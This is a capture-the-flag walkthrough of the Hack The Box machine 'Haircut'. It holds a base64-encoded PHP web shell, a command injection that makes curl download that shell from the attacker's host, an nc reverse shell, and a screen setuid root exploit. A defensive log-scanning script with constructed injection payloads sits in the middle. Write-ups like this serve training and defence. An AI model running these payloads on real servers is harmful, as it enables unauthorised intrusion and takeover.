Hello readers, today we are going to solve the Hack the box machine called Haircut.
OS : Linux
IP : 10.10.10.24
Enumeration:
Nmap scan output reveals two open ports: 80 and 22.
Exploring the IP in the web browser only shows an image, and the HTML source code is a dead end. Enumerating the website with dirbuster reveals a couple of directories (/uploads and /exposed.php). /uploads returns a 403 error.
Upon browsing to /exposed.php, we find a search box on the web page. We set up tcpdump and ping ourselves through the search box; the ping reaches us and we see a curl error message. With curl we can upload or download a backdoor.
Exploitation:
Next we try to see if command injection works through Burp, or if Burp can upload a test file. We intercept the exposed.php request, forward it via Repeater, and it works.
We then create a cmd.php file, start up a Python SimpleHTTPServer, upload the cmd.php (PD9waHAgZWNobyBzeXN0ZW0oJF9SRVFVRVNUWydmcmVzZWMnXSk7ID8+) file to the /uploads directory, and see that it is uploaded.
Next we test for command injection and it works :)
We then set up a nc listener and use cmd.php with a nc reverse shell to get a shell. We get a connect-back that is not obvious, but upon running commands such as ls we can see that the limited shell works.
We then use the python3 -c "import pty;pty.spawn('/bin/bash');" command to get a full shell.
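From the defender's side, the search box above hands user input to curl, so the signals worth looking for in the web server logs are shell metacharacters in that parameter, curl options smuggled into it (the download-a-backdoor trick), and scripts being requested from /uploads. The Python below is an added example written for this writeup, not the box's own code or the author's; it assumes Apache combined-format logs and a parameter name `url` (the real parameter name is not given in the post), and the log lines are constructed.

```python
"""Flag command-injection and upload abuse against a curl-backed search form."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not captured from the box).
SAMPLE_LOGS = [
    '10.10.14.5 - - [11/Jun/2017:10:01:02 +0000] "GET /exposed.php?url=http%3A%2F%2F10.10.14.5%2F HTTP/1.1" 200 512',
    '10.10.14.5 - - [11/Jun/2017:10:01:30 +0000] "GET /exposed.php?url=http%3A%2F%2F10.10.14.5%2Fcmd.php+-o+%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fcmd.php HTTP/1.1" 200 512',
    '10.10.14.5 - - [11/Jun/2017:10:02:00 +0000] "GET /exposed.php?url=127.0.0.1%3Bid HTTP/1.1" 200 512',
    '10.10.14.5 - - [11/Jun/2017:10:02:10 +0000] "GET /uploads/cmd.php?c=id HTTP/1.1" 200 88',
]

# Apache combined format: client, ident, user, [timestamp], "METHOD target proto", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
SHELL_META = re.compile(r'[;|&`\n]|\$\(')              # classic shell separators / substitution
CURL_OUTPUT_OPT = re.compile(r'(^|\s)(-o|-O|--output)(\s|=|$)')  # curl told where to write a file
UPLOADS_SCRIPT = re.compile(r'^/uploads/.+\.(php|phtml|phar)\b', re.I)  # script run from upload dir

def analyse_line(line, param="url"):
    """Return {ip, target, findings} for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    parts = urlsplit(target)
    findings = []
    if parts.path == "/exposed.php":
        # parse_qs undoes percent-encoding and turns '+' back into spaces
        for value in parse_qs(parts.query).get(param, []):
            if SHELL_META.search(value):
                findings.append("shell metacharacters in search input")
            if CURL_OUTPUT_OPT.search(value):
                findings.append("curl output option smuggled into search input")
    elif UPLOADS_SCRIPT.match(parts.path):
        findings.append("script executed from upload directory")
    return {"ip": m.group("ip"), "target": target, "findings": findings}

def scan(lines, param="url"):
    """Return only the parsed entries that produced at least one finding."""
    return [r for r in (analyse_line(l, param) for l in lines) if r and r["findings"]]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit["ip"], hit["target"], "->", "; ".join(hit["findings"]))
```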
Privilege Escalation:
To become root, we use LinEnum.sh to show us the available vulnerabilities. Additionally, we run the command find / -perm -4000 2>/dev/null to list root-owned setuid binaries that we can write to. We find one that has a version number (/usr/bin/screen-4.5.0), and searchsploit / exploit-db has a local privilege escalation exploit for it.
The two PoCs state that we can get root, but we have to compile them first.
I used the below one as it has compile instructions.
I compiled and used wget to transfer it over to our shell.
I followed the compile instructions to get root and SUCCESS!!! We are root :)